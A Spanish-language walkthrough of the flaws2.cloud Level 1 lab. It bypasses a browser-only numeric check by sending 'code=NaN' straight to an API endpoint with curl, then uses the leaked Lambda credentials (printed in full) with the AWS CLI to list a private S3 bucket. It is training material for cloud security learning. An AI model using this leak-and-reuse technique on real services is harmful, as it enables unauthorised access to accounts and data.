Level 1
Seguiremos solo el Attacker Path.
Acceder a
https://level1.flaws2.cloud.s3.amazonaws.com/
Nos tira acceso denegado.
Esto también:
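Parece que se está haciendo una validación del lado del cliente para evitar que enviemos valores inválidos. Al ejecutarse solo en el navegador, esa validación no protege al backend: la API tiene que validar el parámetro por su cuenta.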
<script type="text/javascript">
// Client-side check run from the form's onsubmit handler: rejects the
// submission unless `code` parses as a finite number.
// NOTE(review): this runs only in the browser, so it constrains the form UI
// and nothing else; a request that does not come from this page never passes
// through it. The server must validate `code` itself.
function validateForm() {
var code = document.forms["myForm"]["code"].value;
// parseFloat(code) must not be NaN and isFinite(code) must hold; otherwise
// alert and return false, which cancels the submit.
if (!(!isNaN(parseFloat(code)) && isFinite(code))) {
alert("Code must be a number");
return false;
}
// Falls through with no return value (undefined) when the check passes.
}
</script>
<!-- The form submits `code` to the API Gateway endpoint in `action`; with no
     `method` attribute the browser uses GET, so the value travels in the query
     string. The only check on `code` is the onsubmit handler, which runs in the
     browser and is not a server-side control. -->
<form name="myForm" action="https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1" onsubmit="return validateForm()">
Code:
<input type="text" name="code" value="1234">
<br>
<br>
<input type="submit" value="Submit">
</form>
Vemos la petición que envía la página web:
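Si enviamos la petición directamente a la API con un valor no numérico, sin pasar por la validación del navegador: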
curl https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=NaN
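Nos retorna un volcado de las variables de entorno de la Lambda, que incluye las credenciales temporales de su rol de ejecución (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY y AWS_SESSION_TOKEN). Al parecer, el fallo de fondo es que la función devuelve su entorno al cliente cuando la entrada no es válida; la respuesta de error debería ser genérica y el detalle quedarse en los logs.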
{
"LANG": "en_US.UTF-8",
"AWS_ACCESS_KEY_ID": "ASIAZQNB3KHGFP4V6JRD",
"AWS_LAMBDA_LOG_STREAM_NAME": "2025/11/02/[$LATEST]67f88fc759604d9bb887850d08f46405",
"AWS_XRAY_CONTEXT_MISSING": "LOG_ERROR",
"AWS_SESSION_TOKEN": "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",
"AWS_LAMBDA_FUNCTION_VERSION": "$LATEST",
"AWS_EXECUTION_ENV": "AWS_Lambda_nodejs8.10",
"LD_LIBRARY_PATH": "/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib",
"_HANDLER": "index.handler",
"AWS_REGION": "us-east-1",
"TZ": ":UTC",
"AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129:2000",
"AWS_SECRET_ACCESS_KEY": "wHXiDgRGGoGkHuphXtC3QNc/yoa5CzPKsphtIYSM",
"AWS_LAMBDA_LOG_GROUP_NAME": "/aws/lambda/level1",
"LAMBDA_RUNTIME_DIR": "/var/runtime",
"AWS_DEFAULT_REGION": "us-east-1",
"_AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129",
"AWS_LAMBDA_INITIALIZATION_TYPE": "on-demand",
"PATH": "/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin",
"_AWS_XRAY_DAEMON_PORT": "2000",
"LAMBDA_TASK_ROOT": "/var/task",
"AWS_LAMBDA_FUNCTION_NAME": "level1",
"AWS_LAMBDA_FUNCTION_MEMORY_SIZE": "128",
"AWS_LAMBDA_RUNTIME_API": "127.0.0.1:9001",
"NODE_PATH": "/opt/nodejs/node8/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task:/var/runtime/node_modules",
"_X_AMZN_TRACE_ID": "Root=1-69075a0c-4a96038f09332194548ea86b;Parent=39951c357b226878;Sampled=0;Lineage=1:e547cb94:0"
}
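Creamos un nuevo profile de AWS CLI (level1) con esos datos. Como son credenciales temporales (el identificador de clave empieza por ASIA), el profile debe incluir también el AWS_SESSION_TOKEN.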
aws s3 ls s3://level1.flaws2.cloud
whoami
aws sts get-caller-identity --profile level1
Listamos el bucket
aws s3 ls s3://level1.flaws2.cloud --profile level1
http://level1.flaws2.cloud/secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html